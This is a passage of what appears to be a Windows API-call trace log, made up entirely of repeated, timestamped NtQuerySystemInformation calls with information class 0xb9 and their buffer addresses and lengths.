Length=0x20, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0c0, Length=0x20, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0c0, Length=0x20, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3c8, Length=0x58, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x58, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x58, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x58, ResultLength=0x0) [0243.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f050, Length=0x28, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0d0, Length=0x28, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x20, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x38, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f290, Length=0x58, ResultLength=0x0) [0243.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x28, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x28, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x28, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x28, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x28, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0a0, Length=0x28, ResultLength=0x0) [0243.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0a0, Length=0x28, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef10, Length=0x20, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee90, Length=0x20, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee90, Length=0x20, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee90, Length=0x20, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x20, ResultLength=0x0) [0243.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x38, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, 